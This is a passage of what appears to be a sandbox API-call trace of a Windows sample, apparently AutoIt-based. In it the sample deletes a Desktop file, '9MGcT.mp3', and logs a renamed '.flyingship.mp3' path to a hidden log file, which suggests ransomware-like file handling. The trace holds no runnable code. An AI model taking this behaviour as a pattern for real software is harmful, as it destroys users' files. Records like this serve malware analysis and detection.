lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.245] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.245] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.245] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.245] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0077.245] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.245] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.247] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.247] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.247] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.247] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", lpFilePart=0x0) returned 0x2f [0077.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9408690, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0x7aadcd00, ftLastAccessTime.dwHighDateTime=0x1d5d8d2, ftLastWriteTime.dwLowDateTime=0xcac08480, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x5c46, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="9MGcT.mp3", cAlternateFileName="")) returned 0x6b8b38 [0077.248] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9mgct.mp3")) returned 1 [0077.255] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9408690, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0x7aadcd00, ftLastAccessTime.dwHighDateTime=0x1d5d8d2, ftLastWriteTime.dwLowDateTime=0xcac08480, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x5c46, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="9MGcT.mp3", cAlternateFileName="")) returned 0 [0077.255] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0077.256] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0077.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0077.257] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0077.257] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.257] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0077.257] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.257] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0077.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0077.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0077.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.257] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0077.258] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x4b7, lpOverlapped=0x0) returned 1 [0077.271] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0077.271] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x4b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.271] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0077.271] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.271] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0077.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0077.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x3d) returned 0x74b588 [0077.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3\r\n", cchWideChar=61, lpMultiByteStr=0x74b588, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 61 [0077.272] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0077.272] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0077.272] WriteFile (in: hFile=0x128, lpBuffer=0x74b5d0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x74b5d0*, lpNumberOfBytesWritten=0x61eef4*=0x3c, lpOverlapped=0x0) returned 1 [0077.272] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0077.272] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.272] CloseHandle (hObject=0x128) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.273] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0077.274] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0077.274] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.274] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0077.275] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.275] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0077.275] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.275] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0077.276] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0077.276] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0077.276] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0077.276] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.276] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0a8 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0077.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0077.276] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.277] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0077.277] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.277] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.277] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0077.277] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0077.278] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0077.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.279] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0077.279] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.279] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.279] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.279] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0077.279] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0077.280] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.280] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 